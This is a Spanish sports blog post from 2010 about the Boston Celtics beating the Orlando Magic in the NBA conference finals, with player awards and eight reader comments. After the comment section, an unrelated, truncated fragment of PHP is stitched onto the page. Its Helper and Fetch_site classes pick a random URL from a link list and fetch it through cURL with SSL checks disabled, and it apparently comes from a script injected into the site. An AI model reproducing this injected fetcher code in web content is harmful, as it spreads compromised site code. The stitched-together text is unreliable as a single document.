Playoffs 28/05/2010: Verde Kriptonita

29 de May de 2010 por TheDeerHunter

No hubo lugar a la remontada. Nadie lo ha logrado y de momento nadie lo hará. Ni el mínimo atisbo de duda de que los Celtics iban a lograr anoche su 21º titulo de conferencia. Rondo-Allen-Pierce-Gartnett-Perkins, el quinteto que nunca ha perdido una serie de playoffs. Un anillo no es suficiente para ellos.

Anoche, por si faltaba algo, recuperaron para la causa a Nate Robinson, inédito hasta el momento en postemporada. En circunstancias más que precarias de la segunda unidad verde, el bueno de “KryptoNate” enterró en un segundo cuarto portentoso la más mínima esperanza que hubieran tenido Supermán y los suyos de forzar el séptimo choque.

No era el día para parar al pívot de Orlando. Finalmente sí pudieron contar con Perkins, como también con Big Baby recuperado tras el incidente del otro día. Pero Rasheed Wallace jugó muy mermado optando finalmente por retirarse. Howard sí logró anoche superar a sus pares, pero el resto del equipo se mostró impotente y maniatado. Entre Lewis, Carter y Nelson un 14 de 40 en tiros de campo, 2 de 13 en triples y 9 pérdidas. Muy mal bagaje para los principales espadas de todo un aspirante a finalista de la NBA.

Por parte de los Celtics puede ser normal que Ray Allen y, sobre todo, Pierce hagan un descosido de magnitudes antológicas. No lo es tanto que los verdes le saquen a Orlando 10 rebotes de diferencia. Fue un querer y no poder todo el partido, llegando los verdes a alcanzar diferencias de hasta 24 puntos. No hubo color.

PREMIOS

MVP: Paul Pierce 31 puntos, 13 rebotes, 5 asistencias y 2 robos. Una auténtica pesadilla para Barnes, Carter o quien se le haya puesto por delante en esta serie.

La sorpresa: No le esperábamos ya. Nate Robinson aprovechó y de qué manera la baja de Marquis Daniels haciendo 10 puntitos en una serie de 4 de 7 en un gran segundo cuarto que mató a Orlando.

La decepción: Nelson estuvo horrible tanto frente a Rondo como frente a Robinson. Por su causa Turkoglu era tan imprescindible en la dirección de este equipo.

El mayor esfuerzo en vano: Dwight Howard 28 puntos 12 rebotes, pero demostrando que le queda mucho para ser uno de esos pívots legendarios. Otro año será.

Comenta

8 comentarios a esta entrada

  1. Love Denise dice:
    #1

    No pudo ser, pero la eliminatoria no se perdió ayer, se perdió en los 3 primeros partidos. Rivers recurrió al defenestrado Robinson tras el batacazo de Rondo, y la jugada le salió bien, hizó unos 10 minutitos que terminaron por romper el partido, ayudado también de las continuas perdidas incomprensibles de balón por parte de los Magic.
    Por los Magic, no creo que se le pueda reprochar nada ayer a Howard, se cargó el equipo a las espaldas y si no hubiese sido por él, la paliza hubiese sido de escandalo. La mejor arma de los de florida, el triple, ayer fue su peor enemigo, no les entraba nada, y eso que muchos triples lo hacían completamente solos, en cambio a los Celtics les entraba todo desde el exterior, con el mazazo psicologico que eso conlleva.
    Lewis estuvo horriblemente mal, al igual que en toda la serie, Carter también, conduciendo demasiado el balón, demasiado rol tiene Vince en este equipo para mi gusto, y al duo Pietrus & Barnes que tan buena temporada han hecho, no los he visto en esta serie ni en ataque ni en defensa.
    Y sobre Van Gundy, pienso que ya ha llegado su fin, tampoco es que sea un fracaso el perder con los celtics en la Final de Conferencia, pues la temporada globalmente hablando ha sido muy buena, con fases donde el equipo ha hecho un baloncesto exquisito, pero en esta serie la imagen ha sido bastante mala, la circulación de balón por el perimetro ni ha existido, por lo que creo que un cambio de entrenador y aire fresco nuevo sería lo ideal. Para mí su principal defecto, entre otros, ha sido el no dar oportunidades a Bass y a anderson, más aun cuando Lewis ha estado muy mal,, y el darle demasiada responsabilidad a Carter; y en esta serie, no ha encontrado manera de defender a Pierce, que es bueno, pero tampoco es Lebron.
    No comparto lo que dice Deer de turkoglu, yo al menos no lo he echado de menos, que Turkoglu el año pasado también se marcaba partiditos de 1-12, 4 de 15 en tiros y cosas por ese estilo… y en la dirección, pienso que Nelson y Williams lo han hecho bien (quizas ayer no, pero si el resto del año).

    Bueno el comentario se me hace largo, ya hablaré de los Celtics, que a pesar de haberse zumbado a Cavs y Magic, pienso que tienen que mejorar bastante para derrotar presumiblemente a L.A, sobre todo por dentro, donde sus interiores, en especial Garnett, ofensivamente no han aportado mucho.

      Citar

  2. mmmm dice:
    #2

    Pues yo no veo el juego interior de los Lakers tan superior a Boston. Con una buena defensa sobre Gasol, Bynum tocado y Odom tan irregular, pienso que puede haber igualdad o incluso superioridad de Boston si Sheed y Davis rinden a buen nivel. Además, en ataque, a parte de la superioridad por fuera, los tiros de 4-5 m. de Davis y Garnett y los triples de Sheed pueden hacer mucho daño. Y no nos olvidemos de Rondo, que abre las defensas como melones.
    A priori creo que está todo igualado, dependerá del estado de forma de unos y otros, está claro que no hay ningún Gasol en los celtics, pero como Bynum no se recupere y Odom no esté más regular el banquillo interior de los verdes se los puede comer.

    Espero un buen analisis de la final, si finalmente llegan los Lakers a ella.
    Sobre Orlando, pues que la clave fue no consumar la remontada del primer partido. Es un equipazo, no hay dudas, pero quizás les falte algo más de savoir fare en los momentos decisivos.

      Citar

  3. Viva_Dirk dice:
    #3

    Ese ‘resto del año’ del que habla Denise no sirve de nada en play-offs, Nelson no es un director de juego y el equipo que tienen los Magics es de ejecutores, Carter, Lewis y Howard son jugadores buenos o excelentes en determinadas cosas pero desde luego no son cerebros en una cancha. Ese papel lo cumplia el año pasado Turkoglu y este año lo mas parecido a eso ha tenido que ser JJ Redick.

    Si realmente existiera la posibilidad de traspasar a Lewis por un tio como Joe Johnson la mejora de los Magic sería grande.

      Citar

  4. Love Denise dice:
    #4

    @mmmm: yo parto de la base de que todos esten en condiciones de jugar, no si Bynum está tocado o no, que no sé como llegará. Si llegara a la final vs Lakers, el mas peligroso para L.A yo creo que sería Rondo, porque Kobe se zumba a Allen, Gasol si frenó a Howard el año pasado, puede frenar a este deteriorado Garnett, artest lo puede hacer bien sobre Pierce, y Perkins es en ataque un cero a la izquierda y no debe poner en apuros a bYnum. Del banquillo, hoy en día, Wallace hace un partiod bueno de cada diez, por lo que en la final hará al menos, uno bueno, Glen Davis aporta buenos minutos, y habrá que ver como rivers maneja a Tony Allen y Robinson que estaban ya sepultados y han resucitado.

    @vivadirk: yo no traspasaría a Lewis, le daría un voto de confianza, y en estos Magic, personalmente yo no querría a Jo Jo. A mi Nelson me gusta como base, aunque no sea un base puro, pero tampoco hace falta que haya un Nash en cada equipo, sin base puro tambien se puede hacer una buena circulación de balón, de hecho los Magic lo han hecho este año

      Citar

  5. mmmm dice:
    #5

    Hombre, viéndolo así… Aunque yo no tengo tan claro que Kobe se zumbe a Allen, creo que es un duelo igualado en tanto que Allen demostró hace dos años mucha intensidad defensiva, y Kobe, al ser la primera espada en ataque, no puede desgastarse excesivamente para parar a un tio tan dinámico como Ray. Creo que la clave, como tu dices, se basará en la capacidad de los Lakers para frenar a Rondo y a eso yo añadiría el trabajo que puede hacer Artest sobre Pierce, que sufre ante los grandes defensores (se vio ante LeBron), verdadero cambio de los lakers de hace 2 años (donde Pierce los masacró) con respecto a este.
    Vamos a ver si Tony Allen puede minimizar un poco a Kobe y aportar cositas en ataque, y espero que Nate se convierta en el nuevo House en estas finales.

    De todas formas yo creo que si pasan los Lakers la cosa estará al 50%. Respecto a lo del tema del base coincido en que los Magic han movido bien el balon este año, pero las series que se marcó Turkoglu contra Celtics el año pasado se han echado de menos. Creo que con un tío como Paul o Deron Orlando sería imparable.

      Citar

  6. Love Denise dice:
    #6

    mmmm, no lo tomes al pie de la letra, tampoco quiero decir yo que Allen vaya a hacer un 2/15 en cada partido, es un gran jugador y anotará sus puntos, pero creo que perderá su duelo vs Kobe, ten en cuenta que él tendrá que defenderlo y eso le exigirá mucho desgaste para ir luego fresco al ataque.
    Sobre Robinson, ya comenté hace días que no entendía por qué estaba jugando tan poco, tiene calidad de sobra como para jugar 15 min. minimo
    Y sobre lo de Turkoglu vs Celtics año pasado, por esa regla de 3, si Lewis se hubiese marcado también las serie que se marcó vs Cavs el año pasado, pues es más que probable que Orlando hubiese pasado a la final.
    Particularmente, me gustán los 2 bases de orlando, hasta el 3º, Anthony Johnson lo ha hecho bien cuando ha jugado, yo no tocaría nada de la plantilla solo el entrenador para dar aire fresco al grupo. con Paul o Deron, obviamente mejoraría, pero Nelson tampoco es manco.

      Citar

  7. Jabho dice:
    #7

    Yo creo que Orlando tiene un equipo muy, muy físico y eso ha hecho sufrir mucho sobretodo al juego interior., donde además Howard a estado bien en ataque y en defensa… Garnett hizo una buena serie contra los Cavs y creo que la hará de nuevo buena contra los Lakers, pero es cierto que con los Magic ha sufrido mucho y no ha sio el único.Perkins da para lo que da, pero le ha costado incluso aportar sus puntitos…Por contra creo que el trabajo en defensa de Boston y sobre todo por dentro ha sido buenísimo tanto contra Howard como cerrando las penetraciones de Nelson, Carter,….

    Yo si cambiaría cosas en Orlando. no han sabido jugar los momentos dificiles y por ahí se les ha ido la eliminatoria. Yo le añadiría que tampoco dieron la talla en las finales del año pasado y pensaría en cambios, empezando por el entrenador que se supone manejaba la mejor plantilla de la liga y yo continuaría por Lewis que cobra lo que cobra y es por lo que hay que exigirle…

    Boston muy bien. Se han zumbado a los dos mejor equipos de la regular y cuando juegan intensos son un equipazo. A

      Citar

  8. Jabho dice:
    #8

    Se me ha cortado pero iba a decir que a ver si recuperan físicamente a Sheed y sobretodo a Rondo que es imprescindible que esté bien si queremos tener opciones

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>